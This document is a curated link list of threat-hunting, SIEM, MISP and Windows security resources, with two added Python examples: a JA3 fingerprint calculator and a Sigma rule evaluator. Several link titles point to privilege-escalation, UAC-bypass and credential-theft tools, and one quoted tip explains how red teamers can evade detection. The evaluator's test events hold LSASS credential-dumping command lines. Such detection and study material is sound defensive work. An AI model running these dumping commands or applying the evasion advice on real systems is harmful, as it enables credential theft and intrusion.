HELK : The Hunting ELK or simply the HELK is one of the first open source hunt platforms with advanced analytics capabilities such as SQL declarative language, graphing, structured streaming, and even machine learning via Jupyter notebooks and Apache Spark over an ELK stack
mordor 1,603 8 months ago : Re-play Adversarial Techniques
ioc_writer 200 over 1 year ago : Provide a python library that allows for basic creation and editing of OpenIOC objects
3 of the main observed false positives I've learned while hunting for cmd.exe as a child proc of rundll32.exe (still one of the top 3 preferred hosts for backdoors implemented as DLLs or alike) #threathunting (understanding this kind of FPs is as important as learning new/old TTP traces). For #redteam you can blend in by mimicking case 1: naming your module something like MSI*.tmp and using a similar export function name (DLL path usually under c:\users* so no high priv needed)
thethe : Simple, shareable, team-focused and expandable threat hunting environment

CSIRT / Blue Team / Threat Hunting / Mordor PCAPs 📡:

Capturing Network Packets from Windows Endpoints with Network Shell (Netsh) ⚔️ and Azure Network Watcher 🌩 Part 1

CSIRT / Blue Team / Threat Hunting

cyber-threat-response-clinic 4 6 days ago
opencti : Open Cyber Threat Intelligence Platform
securityonion 3,293 4 days ago : Security Onion 2.0 (Pre-release) - Linux distro for threat hunting, enterprise security monitoring, and log management
TheHive 3,446 almost 2 years ago : a Scalable, Open Source and Free Security Incident Response Platform
TheHive4py 218 11 days ago : Python API Client for TheHive
TheHiveIRPlaybook 12 over 4 years ago is a collection of TheHive case templates used for Incident Response
Cortex-Analyzers 434 14 days ago : Cortex Analyzers Repository
Nimbus Network Traffic Analyzer Augmented with our world-class threat intelligence
ja3 2,768 about 1 year ago is a standard for creating SSL client fingerprints in an easy to produce and shareable way
Threat Hunting Process 5 over 4 years ago
Threat Hunting Principles 372 almost 2 years ago
TypeDB CTI 145 about 1 year ago :
Some repos from hunters-forge: API-To-Event 75 about 5 years ago
Yeti 1,745 7 days ago : Your Everyday Threat Intelligence
Watcher 862 15 days ago : Open Source Cybersecurity Threat Hunting Platform. Developed with Django & React JS
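The JA3 fingerprint listed above, worked through as an added example (not the JA3 project's code): the five fields are the ClientHello's version, cipher suites, extension types, supported groups and EC point formats, each in wire order with GREASE values dropped, joined with commas and hashed with MD5. The ClientHello is constructed by `build_client_hello()` (with GREASE values included on purpose) rather than captured from a real client.

```python
"""Compute a JA3 client fingerprint from a raw TLS ClientHello record.

Added example, not code from the JA3 project. The ClientHello used here is
constructed by build_client_hello(), not captured from a real client.
"""
import hashlib
import struct

# GREASE values (RFC 8701) vary per connection, so JA3 drops them.
GREASE = {0x0a0a, 0x1a1a, 0x2a2a, 0x3a3a, 0x4a4a, 0x5a5a, 0x6a6a, 0x7a7a,
          0x8a8a, 0x9a9a, 0xaaaa, 0xbaba, 0xcaca, 0xdada, 0xeaea, 0xfafa}


def _u16s(values):
    return b"".join(struct.pack(">H", v) for v in values)


def build_client_hello(version, ciphers, extensions):
    """Serialize a TLS record carrying a ClientHello (constructed test input).

    extensions: list of (type, body) pairs in wire order.
    """
    ext_bytes = b"".join(struct.pack(">HH", t, len(body)) + body
                         for t, body in extensions)
    body = (struct.pack(">H", version)
            + bytes(32)                                         # client random
            + b"\x00"                                           # session id: empty
            + struct.pack(">H", 2 * len(ciphers)) + _u16s(ciphers)
            + b"\x01\x00"                                       # compression: null only
            + struct.pack(">H", len(ext_bytes)) + ext_bytes)
    handshake = b"\x01" + len(body).to_bytes(3, "big") + body   # type client_hello
    return b"\x16\x03\x01" + struct.pack(">H", len(handshake)) + handshake


def parse_client_hello(record):
    """Return (version, ciphers, extension_types, groups, point_formats)."""
    if record[0] != 0x16 or record[5] != 0x01:
        raise ValueError("not a TLS ClientHello record")
    hs, off = record[5:], 4                      # skip handshake type + 3-byte length
    version = struct.unpack(">H", hs[off:off + 2])[0]
    off += 2 + 32                                # version, random
    off += 1 + hs[off]                           # session id
    cs_len = struct.unpack(">H", hs[off:off + 2])[0]
    off += 2
    ciphers = list(struct.unpack(f">{cs_len // 2}H", hs[off:off + cs_len]))
    off += cs_len
    off += 1 + hs[off]                           # compression methods
    ext_types, groups, point_formats = [], [], []
    if off < len(hs):
        end = off + 2 + struct.unpack(">H", hs[off:off + 2])[0]
        off += 2
        while off < end:
            etype, elen = struct.unpack(">HH", hs[off:off + 4])
            body = hs[off + 4:off + 4 + elen]
            off += 4 + elen
            ext_types.append(etype)
            if etype == 10:       # supported_groups: u16 list length, u16 ids
                n = struct.unpack(">H", body[:2])[0]
                groups = list(struct.unpack(f">{n // 2}H", body[2:2 + n]))
            elif etype == 11:     # ec_point_formats: u8 list length, u8 ids
                point_formats = list(body[1:1 + body[0]])
    return version, ciphers, ext_types, groups, point_formats


def ja3_string(record):
    """SSLVersion,Ciphers,Extensions,EllipticCurves,EllipticCurvePointFormats."""
    version, ciphers, exts, groups, pfs = parse_client_hello(record)

    def field(values):
        return "-".join(str(v) for v in values if v not in GREASE)

    return ",".join([str(version), field(ciphers), field(exts), field(groups), field(pfs)])


def ja3_hash(record):
    return hashlib.md5(ja3_string(record).encode()).hexdigest()


SAMPLE_HELLO = build_client_hello(
    0x0303,
    [0x0a0a, 0x1301, 0x1302, 0xc02b],                   # GREASE, two TLS 1.3 suites, one ECDHE suite
    [(0x1a1a, b""),                                      # GREASE extension
     (0, b"\x00\x10\x00\x00\x0dexample.local"),          # server_name
     (10, b"\x00\x08\x2a\x2a\x00\x1d\x00\x17\x00\x18"),  # supported_groups: GREASE, x25519, P-256, P-384
     (11, b"\x01\x00")],                                 # ec_point_formats: uncompressed
)

if __name__ == "__main__":
    print(ja3_string(SAMPLE_HELLO))   # 771,4865-4866-49195,0-10-11,29-23-24,0
    print(ja3_hash(SAMPLE_HELLO))
```

Note that the version field comes from the ClientHello body (0x0303, 771), not from the record layer (0x0301), and that without the GREASE filter the same client would produce a different hash on every connection, which is exactly why the filter is part of the standard.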

CSIRT / Blue Team / Threat Hunting / Network Analysis:

traffic-analysis-workshop 78 about 3 years ago
Wireshark Tutorial: Exporting Objects from a Pcap
Hex Packet Decoder : an online tool for you to parse network packets
Packetor : Packetor is an online hex-dump packet analyzer / decoder
Termshark : A terminal UI for tshark, inspired by Wireshark
Wireshark Tutorial: Wireshark Workshop Videos Now Available
Wireshark Tutorial: Decrypting HTTPS Traffic

CSIRT / Blue Team / Threat Hunting

Lookup Before You Go-Go...Hunting
Insider Threat Hunting
Wazuh : a free, open source and enterprise-ready security monitoring solution for threat detection, integrity monitoring, incident response and compliance
Hunting the Hunters - RCE in Covenant C2
Passive SSH : Passive SSH is an open source framework composed of a scanner and server to store and lookup the SSH keys and fingerprints per host (IPv4/IPv6/onion)
Cyber Threat Intelligence
Cloud Threat Hunting: Attack & Investigation Series- Lateral Movement – Under the Radar
D4 core 43 11 months ago : D4 core software (server and sample sensor client)
A Top 10 Reading List if You’re Getting Started in Cyber Threat Intelligence
CTI SquadGoals — Setting Requirements
Threat Intelligence Naming Conventions: Threat Actors, & Other Ways of Tracking Threats
BeaconEye 885 3 months ago : Hunts out CobaltStrike beacons and logs operator command output
Datafeeds/API SANS DShield
The State of Threat Hunting and the Role of the Analyst
Deepfence ThreatMapper 4,837 7 days ago : Identify vulnerabilities in running containers, images, hosts and repositories
SQUIRRELWAFFLE Leverages malspam to deliver Qakbot, Cobalt Strike
All Access Pass: Five Trends with Initial Access Brokers
Paint it, Blue - Transitioning from CTI to HUNT 13 over 1 year ago : Ekoparty's BlueSpace Keynote November 2021. Shoutout to @plugxor, many thanks!!!
Interesting large and small malspam attachments from 2023
MISP (core software) 5,387 6 days ago Open Source Threat Intelligence Platform (formerly known as Malware Information Sharing Platform)
MISP galaxy 531 7 days ago : Clusters and elements to attach to MISP events or attributes (like threat actors)
DigitalSide Threat-Intel 148 about 1 month ago : Threat-Intel repository
MISP-sizer 11 over 6 years ago : Sizing your MISP instance
MISP RPM 34 about 1 month ago : RPM packages for MISP
ansible MISP 52 11 days ago : ansible role to setup MISP, Malware Information Sharing Platform & Threat Sharing
MISP CERT.br
misp-warninglist 532 11 days ago : Warning lists to inform users of MISP about potential false-positives or other information in indicators
MISP-maltego 170 5 months ago : Set of Maltego transforms to interface with a MISP Threat Sharing instance, and also to explore the whole MITRE ATT&CK dataset
misp-modules 345 4 days ago : Modules for expansion services, import and export in MISP
misp-taxonomies 264 4 days ago : Taxonomies used in MISP taxonomy system and can be used by other information sharing tool
PyMISP 445 7 days ago : Python library using the MISP Rest API
MISP Concepts Cheat sheet
CyCAT.org API services 30 almost 2 years ago : API back-end server including crawlers
teslacoil.py : Monitors some log files and sends new entries to syslog

CSIRT / Blue Team / Threat Hunting / Tutorials:

MISP Training - Youtube CIRCL
Youtube CIRCL
PyMISP and MISP Objects: a door to new opportunities
Additional MISP training materials (including slides, documentation and videos) 389 about 1 month ago
Additional MISP training materials for law-enforcement agencies 31 about 1 year ago

CSIRT / Blue Team / Threat Hunting

More than a Dozen Obfuscated APT33 Botnets Used for Extreme Narrow Targeting (APT33)
Dismantling a fileless campaign: Microsoft Defender ATP’s Antivirus exposes Astaroth attack
Adversary Reports : The latest whitepapers, solution briefs, and datasheets from Dragos
APT29 targets COVID-19 vaccine development
What is APT28's Drovorub Malware?
Dispatches from Drovorub: Network Threat Hunting for Russia GRU GTsSS'​ Malware at Scale
Tracking A Malware Campaign Through VT
More Evidence of APT Hackers-for-Hire Used for Industrial Espionage
US Charges Five Alleged Members of APT41 Group
Analysis Report (AR20-268A)
Cyber Planning for Response and Recovery Study CYPRESS - 2020 FERC, NERC and REs Report
TA505 CHIMBORAZO
Threat Group Cards: A Threat Actor Encyclopedia
Highly Evasive Attacker Leverages SolarWinds Supply Chain to Compromise Multiple Global Victims With SUNBURST Backdoor (also: Symantec analysis, SunBurst_DGA_Decode)
SolarWinds Security Advisory
If you work in a SOC, print out this screenshot & pin it to a wall in your office
Customer Guidance on Recent Nation-State Cyber Attacks
Mapping out AridViper Infrastructure Using Augury’s Malware Module
The Story of Jian : How APT31 Stole and Used an Unknown Equation Group 0-Day
APT Encounters of the Third Kind
Lazarus APT conceals malicious code within BMP image to drop its RAT
distribute malicious zip with lnk? MSHTA > wscript > new LNK in startup > Reboot > MSHTA > wscript.
Analysis of the Iranian cyber attack landscape
Lemon Duck spreads its wings : Actors target Microsoft Exchange servers, incorporate new TTPs
threat actor touching an endpoint
China’s PLA Unit 61419 Purchasing Foreign Antivirus Products, Likely for Exploitation
APTnotes 1,658 4 months ago is a repository of publicly-available papers and blogs (sorted by year) related to malicious campaigns/activity/software that have been associated with vendor-defined APT (Advanced Persistent Threat) groups and/or tool-sets
The Active Adversary Playbook 2021 : Attacker behaviors, tactics, techniques and procedures (TTPs)
An Update on Industrialize the Tracking of Botnet Operations
Patchwork APT caught in its own web
Armageddon/Gamaredon
North Korea’s Lazarus APT leverages Windows Update client, GitHub in latest campaign
Update on cyber activity in Eastern Europe
Cisco Talos shares insights related to recent cyber attack on Cisco
Operation Triangulation: The last (hardware) mystery

CSIRT / Blue Team / IoCs

sophos labs IoCs 545 17 days ago : Sophos-originated indicators-of-compromise from published reports
DailyIOC 310 12 months ago : IOC from articles, tweets for archives
CVE-2020-1472 Zerologon IoCs
iocs 702 about 1 month ago : Indicators from Unit 42 Public Reports
Threat intelligence and threat detections 53 almost 4 years ago : Threat intelligence and threat detection indicators (IOC, IOA)
APT_Digital_Weapon 896 3 months ago : Indicators of compromise (IOCs) collected from public resources and categorized by Qi-AnXin
Ryuk Speed Run, 2 Hours to Ransom
What did DeathStalker hide between two ferns?
Yikes, Microsoft have signed multiple rootkits (which allow kernel drivers) and reach out to a remote IP
Netfilter Rootkit Samples
Feodo Tracker tracks certain families that are related or that evolved from Feodo
There are evil packages on the npm registry that deploy XMRIG
Emotet 2022 | epoch4 | 22.04.2022 | 55 over 1 year ago
238 Cobalt Strike stage 2 IP's, with 238 unique configurations, identified today.
malware-IoC 14 about 1 year ago : Welcome to the official IoC repository of the Entel Cyber Secure Cyber Threat Intelligence team
IcedID | 31.08.2022 | Campaign 2786525712 34 12 months ago

CSIRT / Blue Team / SIEM

Sigma 8,371 7 days ago : Generic Signature Format for SIEM Systems

CSIRT / Blue Team / SIEM / Sigma

Suspicious Use of Procdump 8,371 7 days ago : Detects suspicious uses of the SysInternals Procdump utility by using a special command line parameter in combination with the lsass.exe process. This way we're also able to catch cases in which the attacker has renamed the procdump executable
KrbRelayUp local privilege escalation. 115 2 months ago
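The procdump/lsass rule above is a good illustration of why Sigma matches on the command line rather than on the image name. As an added example (not the SigmaHQ rule's YAML nor Sigma's own tooling), here is a minimal Python evaluator for a Sigma-style `contains|all` selection, run over constructed process-creation events; the rule body paraphrases the description above and is assumed, not copied from the repository.

```python
"""Evaluate a Sigma-style process-creation rule in Python.

Added example, not the SigmaHQ rule itself and not Sigma's tooling. RULE
paraphrases the rule's description (procdump switch plus lsass in the
command line); EVENTS are constructed records, not real telemetry.
"""
import re

# Sigma string matching is case-insensitive; keys between selection
# entries are ANDed, values in a list are ORed unless |all is given.
RULE = {
    "title": "Suspicious Use of Procdump on LSASS (illustrative, assumed)",
    "detection": {
        "selection": {
            "CommandLine|contains|all": [" -ma ", "lsass"],
        },
        "condition": "selection",
    },
}


def _matches_field(value, modifiers, patterns):
    value = value.lower()
    patterns = [p.lower() for p in patterns]
    if "contains" in modifiers:
        hits = [p in value for p in patterns]
    elif "startswith" in modifiers:
        hits = [value.startswith(p) for p in patterns]
    elif "endswith" in modifiers:
        hits = [value.endswith(p) for p in patterns]
    elif "re" in modifiers:
        hits = [re.search(p, value, re.IGNORECASE) is not None for p in patterns]
    else:
        hits = [value == p for p in patterns]
    return all(hits) if "all" in modifiers else any(hits)


def selection_matches(selection, event):
    """True when every 'Field|modifiers: patterns' entry of the selection holds."""
    for key, patterns in selection.items():
        field, *modifiers = key.split("|")
        if field not in event:
            return False
        if isinstance(patterns, str):
            patterns = [patterns]
        if not _matches_field(str(event[field]), modifiers, patterns):
            return False
    return True


def evaluate(rule, event):
    detection = rule["detection"]
    if detection["condition"] != "selection":
        raise NotImplementedError("only the plain 'selection' condition is implemented here")
    return selection_matches(detection["selection"], event)


EVENTS = [  # constructed Sysmon Event ID 1-style records
    {"Image": r"C:\Tools\procdump64.exe",
     "CommandLine": r"procdump64.exe -accepteula -ma lsass.exe C:\Temp\l.dmp"},
    {"Image": r"C:\Users\Public\svchost.exe",          # dump by PID: evades this rule
     "CommandLine": r"svchost.exe -ma 624 out.dmp"},
    {"Image": r"C:\Users\Public\update.exe",           # renamed procdump: still caught
     "CommandLine": r"update.exe -accepteula -ma lsass C:\Users\Public\u.dmp"},
    {"Image": r"C:\Tools\procdump64.exe",
     "CommandLine": r"procdump64.exe -ma notepad.exe"},
    {"Image": r"C:\Windows\System32\taskmgr.exe", "CommandLine": r"taskmgr.exe"},
]


def alerts(rule, events):
    """Return the command lines of every event the rule fires on."""
    return [e["CommandLine"] for e in events if evaluate(rule, e)]


if __name__ == "__main__":
    for cmdline in alerts(RULE, EVENTS):
        print("ALERT:", cmdline)
```

The second event shows the gap a practitioner should expect: procdump also accepts a PID, so `-ma 624` never mentions lsass and slips past a command-line rule; cover that case with Sysmon Event ID 10 (ProcessAccess) on lsass.exe rather than by loosening the string match.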

CSIRT / Blue Team / SIEM

Events Heatmap
RedELK 2,383 2 months ago : Red Team's SIEM - easy deployable tool for Red Teams used for tracking and alarming about Blue Team activities as well as better usability in long term operations
plaso 1,734 about 1 month ago : Super timeline all the things
Heatmaps Make Ops Better
graylog-guide-snort 27 about 1 year ago : How to send structured Snort IDS alert logs into Graylog
TALR 89 almost 6 years ago : Threat Alert Logic Repository
Auditing Continuously vs. Monitoring Continuously
Logsspot : Logsspot is a project created to help cybersec folks understand what kind of information a security technology can present and how to use it to improve detection and intelligence
Corsair 7 over 5 years ago : Python wrapper for some NSOC tools. Corsair aims to implement RESTFul wrappers for different tools commonly used by Network and Security Operations Centers (NSOC)
Scalable Logging and Tracking
Logs were our lifeblood. Now they're our liability.
Using Flume to Collect Apache 2 Web Server Logs
spectx : Instantly parse and investigate raw log files
The log/event processing pipeline you can't have
Building a SIEM: combining ELK, Wazuh HIDS and Elastalert for optimal performance
Here's a Splunk way to score behaviors that are derived from detections
ProductLoggingTracker 7 almost 5 years ago : Simple list of product types that InfoSec professionals may want to collect into a central repository
The Log Pile : scripts to help decide which logs to save
Part of my role is ensuring we're not EDR-centric. We have to be able to detect threats w/o OS-level viz (e.g., control plane only), using auth/net events, or whatever data is in a SIEM
LORG 209 over 5 years ago : Apache Logfile Security Analyzer
Shipping to Elasticsearch Microsoft DNS Logs
Windows 10 ETW Events 267 7 months ago : Events from all manifest-based and mof-based ETW providers across Windows 10 versions
Log Parser Lizard : provides a modern graphical user interface to Microsoft Log Parser 2.2 for analyzing logs using SQL queries
Fluentd 12,912 10 days ago : Unified Logging Layer (project under CNCF)
Laurel 711 23 days ago : Transform Linux Audit logs for SIEM usage
Matano 1,470 4 months ago : The open-source

CSIRT / Browsers

SOK: On the Analysis of Web Browser Security
Bypassing Browser Security Warnings with Pseudo Password Fields
The 9 Lives of Bleichenbacher's CAT: New Cache ATtacks on TLS Implementations
How To Blow Your Online Cover With URL Previews
Nefarious LinkedIn : A look at how LinkedIn exfiltrates extension data from your browser
Lightnion 119 about 4 years ago : A light version of Tor portable to the browser
Puppeteer 88,848 8 days ago : Headless Chrome Node API
uBlock Origin 47,504 6 days ago : An efficient blocker for Chromium and Firefox. Fast and lean
autochrome 446 8 months ago : This tool downloads, installs, and configures a shiny new copy of Chromium
BROWSERGAP : Browse Anything Securely, Browse the web without the web browsing you
browsergap.ce 3,454 13 days ago : Simple Isolated Remote Browsers, Open Source
Crash Chrome
Firefox: How a website could steal all your cookies
Online Trackers Increasingly Switching to Invasive CNAME Cloaking Technique

CSIRT / Browsers / Browsers Addons

Addons for Firefox :
LinkGopher
WebDeveloper
IPvFoo
DownthemAll
SixorNot
Uppity
Cliget
URLs List
Link Redirect Trace
Tamper Data for FF Quantum
BuiltWith
Wappalyzer
Exif Viewer
Anti-Grabify Browser Extension 64 8 months ago

CSIRT / Operating Systems

bochspwn-reloaded 297 over 5 years ago : A Bochs-based instrumentation performing kernel memory taint tracking to detect disclosure of uninitialized memory to ring 3
drltrace 389 over 4 years ago : Drltrace is a library calls tracer for Windows and Linux applications
shellz 569 4 months ago : a small utility to track and control your ssh, telnet, web and custom shells
CLIP OS : Open Source secured operating system by Agence nationale de la sécurité des systèmes d'information
How to Get Started With VMware vSphere Security « vMiss.net
routeros 866 almost 2 years ago : RouterOS Bug Hunt Materials Presented at Derbycon 2018
Awesome-Study-Resources-for-Kernel-Hacking 106 over 8 years ago : Kernel Hacking study materials collection
Skadi 491 about 2 years ago : Collect, Process, and Hunt with host based data from MacOS, Windows, and Linux
taintgrind 249 about 1 year ago : A taint-tracking plugin for the Valgrind memory checking tool
UPX is a free, portable, extendable, high-performance executable packer for several executable formats

CSIRT / Operating Systems / Mainframe:

MF Sniffer 47 over 1 year ago : Mainframe TN3270 unencrypted TSO session user ID and password sniffer

CSIRT / Operating Systems

magic-trace 4,658 about 1 month ago : collects and displays high-resolution traces of what a process is doing

CSIRT / Operating Systems / UEFI

uefi-jitfuck 85 over 6 years ago : A JIT compiler for Brainfuck running on x86_64 UEFI
Secure Boot in the Era of the T2 : Continuing our series on Apple’s new T2 platform and examining the role it plays in Apple’s vision of Secure Boot
PSPTool 611 2 months ago : Display, extract, and manipulate PSP firmware inside UEFI images
Project Mu : is a modular adaptation of TianoCore's edk2 tuned for building modern devices using a scalable, maintainable, and reusable pattern
Force firmware code to be measured and attested by Secure Launch on Windows 10

CSIRT / Operating Systems / Windows

Awesome Advanced Windows Exploitation References 1,457 almost 3 years ago
windows kernel security development 1,957 about 2 years ago
A process scanner detecting and dumping hollowed PE modules. 2,032 16 days ago
dll_to_exe 794 over 1 year ago : Converts a DLL into EXE
pe-sieve 3,103 16 days ago : Scans a given process. Recognizes and dumps a variety of potentially malicious implants (replaced/injected PEs, shellcodes, hooks, in-memory patches)
A PowerShell utility to dynamically uncover a DCShadow attack
MSRC 1,324 4 months ago : Security Research from the Microsoft Security Response Center
DCSYNCMonitor 138 over 6 years ago
Total Meltdown?
DetectionLab 4,647 5 months ago : Vagrant & Packer scripts to build a lab environment complete with security tooling and logging best practices. Post
powerlessshell 1,474 over 1 year ago : Run PowerShell command without invoking powershell.exe
internal-monologue 1,401 about 6 years ago : Internal Monologue Attack: Retrieving NTLM Hashes without Touching LSASS
Robber 765 over 2 years ago is open source tool for finding executables prone to DLL hijacking
Remote-Desktop-Caching 208 over 6 years ago
LogRM 73 over 5 years ago : LogRM is a post-exploitation PowerShell script which uses Windows event logs to gather information about
InvisiblePersistence 338 over 6 years ago : Persisting in the Windows registry "invisibly"
Dynamic Tracing in Windows 10 19H1
Capturing NetNTLM Hashes with Office [DOT] XML Documents
LoL Malware Meets Python-Based Command and Control (C2) Server, Part I
Passing-the-Hash to NTLM Authenticated Web Applications
Detours 5,270 about 1 month ago : Detours is a software package for monitoring and instrumenting API calls on Windows. It is distributed in source code form
r0ak 28 about 6 years ago : r0ak ("roak") is the Ring 0 Army Knife -- A Command Line Utility To Read/Write/Execute Ring Zero on Windows 10 Systems
SpeculationControl 130 over 1 year ago : SpeculationControl is a PowerShell script that summarizes the state of configurable Windows mitigations for various speculative execution side channel vulnerabilities, such as CVE-2017-5715 (Spectre variant 2) and CVE-2017-5754 (Meltdown)
Reverse Engineering Windows Defender (by Alexei Bulazel)

CSIRT / Operating Systems / Windows / pdf

XOR encryption – Windows x64 Ground Zero: Part 2-2
Building Cracked Binaries – Windows x64 Ground Zero: Part 2-3

CSIRT / Operating Systems / Windows

EKFiddle 636 5 days ago : A framework based on the Fiddler web debugger to study Exploit Kits, malvertising and malicious traffic in general
Windows Command-Line : Introducing the Windows Pseudo Console (ConPTY) – Windows Command Line Tools For Developers
MSconsole 95,774 6 days ago : Windows Console Tools
PowerShell Remoting by Stephanos Constantinou Blog
DbgShell 675 8 months ago : A PowerShell front-end for the Windows debugger engine
Windows Incident Response: Updates
Win 10 related research 178 11 months ago
Event log 'Keywords' p1 178 11 months ago
Windows 10 - Notifications 178 11 months ago

CSIRT / Operating Systems / Windows

UAC bypass using CreateNewLink COM interface

CSIRT / Operating Systems / Windows / Privilege Escalation:

Windows Privilege Escalation (Unquoted Path Service)
WinPwnage 2,622 almost 2 years ago : Elevate, UAC bypass, privilege escalation, dll hijack techniques
Securing SCOM in a Privilege Tiered Access Model –Part 1
Windows Privilege Escalation Guide : This guide is influenced by g0tm1lk’s Basic Linux Privilege Escalation, which at some point you should have already seen and used. I wanted to try to mirror his guide, except for Windows. So this guide will mostly focus on the enumeration aspect
An introduction to privileged file operation abuse on Windows : This is a (bit long) introduction on how to abuse file operations performed by privileged processes on Windows for local privilege escalation (user to admin/system), and a presentation of available techniques, tools and procedures to exploit these types of bugs
Control Flow Guard Teleportation : The idea that I tried in 2018 was to use Control Flow Guard (CFG) to regenerate my code in a special memory region. CFG is a security feature that aims to mitigate the redirection of the execution flow, for example, by checking if the target address for an indirect call is a valid function. [demo](https:/
The purpose of this application is to analyze and create statistics of repetitive lock patterns that everyday users create and use.
An unprivileged window could just send commands to a highly privileged window, and that's what UIPI, User Interface Privilege Isolation, prevents. This isn't a story about UIPI, but it is how it began.
Interactive CTF Exploration Tool
PsExec Local Privilege Escalation
SweetPotato 1,622 3 months ago : Local Service to SYSTEM privilege escalation from Windows 7 to Windows 10 / Server 2019
Windows Exploit Suggester - Next Generation (WES-NG) 4,226 10 days ago
Windows Local Privilege Escalation Cookbook 981 8 months ago

CSIRT / Operating Systems / Windows

Remote NTLM relaying through meterpreter on Windows port 445
A TCP packet diverter for Windows platform
Analyzing obfuscated powershell with shellcode
Empire 4.2 was just finalized over the weekend and we are excited to share some of the new features.
relayer 148 almost 6 years ago : SMB Relay Attack Script
Ps1jacker 61 about 6 years ago : Ps1jacker is a tool for generating COM Hijacking payload
python-dotnet-binaryformat 49 about 6 years ago : Pure Python parser for data encoded by .NET's BinaryFormatter
Firework 44 over 4 years ago : Firework is a proof of concept tool to interact with Microsoft Workplaces creating valid files required for the provisioning process
UACME 6,377 4 months ago : Defeating Windows User Account Control
SysmonTools 1,488 6 months ago : Utilities for Sysmon
sysmon-config 4,803 5 months ago : Sysmon configuration file template with default high-quality event tracing
Sysmon: how to set up, update and use?
Panache_Sysmon : Just another sysmon config
Hiding malware in Windows – The basics of code injection
Inveigh 2,555 4 months ago : Windows PowerShell ADIDNS/LLMNR/mDNS/NBNS spoofer/man-in-the-middle tool
Bypassing AppLocker Custom Rules : 0x09AL Security blog
SpecuCheck 569 about 5 years ago : SpecuCheck is a Windows utility for checking the state of the software mitigations against CVE-2017-5754 (Meltdown) and hardware mitigations against CVE-2017-5715 (Spectre)
RID-Hijacking 165 about 2 years ago : Windows RID Hijacking persistence technique
WSL Reloaded
Windows oneliners to download remote payload and execute arbitrary code
reflectivepotato : MSFRottenPotato built as a Reflective DLL. Work in progress
randomrepo 0 10 months ago : Repo for random stuff
Microsoft Windows win32k.sys : Invalid Pointer Vulnerability (MSRC Case 48212) - Security Research
rdpy 1,690 over 3 years ago : Remote Desktop Protocol in Twisted Python
SharpWeb 510 almost 6 years ago : .NET 2.0 CLR project to retrieve saved browser credentials from Google Chrome, Mozilla Firefox and Microsoft Internet Explorer/Edge
reconerator 121 almost 4 years ago : C# Targeted Attack Reconnaissance Tools
ManagedInjection 162 over 6 years ago : A proof of concept for dynamically loading .NET assemblies at runtime with only a minimal convention pre-knowledge
InveighZero 791 about 2 years ago : C# LLMNR/NBNS spoofer
DanderSpritz Lab 419 over 5 years ago : A fully functional lab in 2 commands
Lateral movement using URL Protocol
HiddenPowerShell 93 about 6 years ago : This project was created to explore the various evasion techniques involving PowerShell: Amsi, ScriptBlockLogging, Constrained Language Mode and AppLocker
One Windows Kernel
The Dog Whisperer’s Handbook : This PDF is a collection of bits and pieces that were scattered across the web and that I collected in the last two years while writing the CypherDog PowerShell module
Attack and Defend microsoft enhanced security administrative environment
raw-socket-sniffer 180 about 6 years ago : Packet capture on Windows without a kernel driver
DCOMrade 254 almost 6 years ago : Powershell script for enumerating vulnerable DCOM Applications
shed 268 almost 6 years ago : .NET runtime inspector
Recovering Plaintext Domain Credentials from WPA2 Enterprise on a Compromised Host
How to steal NTLMv2 hashes using file download vulnerability in web application
NTLMRelay2Self 394 10 months ago : An other No-Fix LPE, NTLMRelay2Self over HTTP (Webdav)
Simpleator 335 almost 6 years ago : ("Simple-ator") is an innovative Windows-centric x64 user-mode application emulator that lever
WinDbg-Samples 722 3 months ago : Sample extensions, scripts, and API uses for WinDbg
OrgKit 597 3 months ago : Provision a brand-new company with proper defaults in Windows, Office 365, and Azure
Leveraging WSUS
windowsblindread 199 over 1 year ago : A list of files / paths to probe when arbitrary files can be read on a Microsoft Windows operating system
azucar 562 about 2 years ago : Security auditing tool for Azure environments
volatility-wnf 15 almost 6 years ago : Browse and dump Windows Notification Facilities
Yet another sdclt UAC bypass : As often with UAC, the flaw comes from an auto-elevated process. These processes have the particularity to run with high integrity level without prompting the local admin with the usual UAC window
awesome-windows-kernel-security-development 1,957 about 2 years ago : windows kernel security development
ALPC-BypassUAC 155 over 5 years ago : UAC Bypass with mmc via alpc
ManagedPasswordFilter 45 over 5 years ago : Windows Password Filter that uses managed code internally
DeviceGuardBypasses 133 over 7 years ago : A repository of some of my Windows 10 Device Guard Bypasses
rifiuti2 143 7 months ago : Windows Recycle Bin analyser
Reversing and Patching .NET Binaries with Embedded References
Lateral Movement Using Outlook’s CreateObject Method and DotNetToJScript
Windows PowerShell Remoting : Host Based Investigation and Containment Techniques
.NET Manifesto : win friends and influence the loader
Bypassing Windows User Account Control
symboliclink-testing-tools 758 almost 2 years ago : This is a small suite of tools to test various symbolic link types of Windows
Run PowerShell without Powershell.exe — Best tools & techniques
Bypassing the Microsoft-Windows-Threat-Intelligence Kernel APC Injection Sensor
Privileged Access Workstations
Activation Contexts — A Love Story. Windows loads a version of the Microsoft.Windows.SystemCompatible assembly manifest into every process. Tampering with it lets you inject DLL side-loading opportunities into every process, and to perform COM hijacking without touching the registry. Unfortunately, the manifest could be replaced by another version, possibly killing your persistence by surprise
Evil-WinRM 4,537 25 days ago : The ultimate WinRM shell for hacking/pentesting
Understanding WdBoot (Windows Defender ELAM)
SharpHide 465 about 5 years ago : Tool to create hidden registry keys
Microsoft Finally Releases Guidance and a Script to Change the KRBTGT Account
Deploying honeytokens in Active Directory & How to trick attackers with deceptive BloodHound paths
CrackMapExec module to set as "owned" on BloodHound every target owned by the attacker
Configuring Additional LSA Protection
Getting Malicious Office Documents to Fire with Protected View Enabled

CSIRT / Operating Systems / Windows / The Internals of AppLocker:

Part 1: Overview and Setup
Part 2: Blocking Process Creation
Part 3: Access Tokens and Access Checking
Part 4: Blocking DLL Loading

CSIRT / Operating Systems / Windows

COM-Code-Helper 178 about 4 years ago : Two IDAPython Scripts help you to reconstruct Microsoft COM (Component Object Model) Code
Scylla 1,116 over 1 year ago : Imports Reconstructor
A Speed-Research on Windows Explorer's Auto-Completion
sysmon-config 4,803 5 months ago : A Sysmon configuration file for everybody to fork
Windows Event Forwarding Guidance 1,228 4 months ago
Build a fast, free, and effective Threat Hunting/Incident Response Console with Windows Event Forwarding and PowerBI
Microsoft Defender Advanced Threat Protection (ATP)
BeaKer 285 about 2 months ago Beaconing Kibana Executable Report: Aggregates Sysmon Network Events With Elasticsearch and Kibana
python-ntlm 90 over 2 years ago : Automatically exported from code.google.com/p/python-ntlm
Logging Made Easy 706 about 1 year ago : is a self-install tutorial for small organisations to gain a basic level of centralised security logging for Windows clients and provide functionality to detect attacks
lme 706 about 1 year ago : Logging Made Easy, is a self-install tutorial for small organisations to gain a basic level of centralised security logging for Windows clients and provide functionality to detect attacks
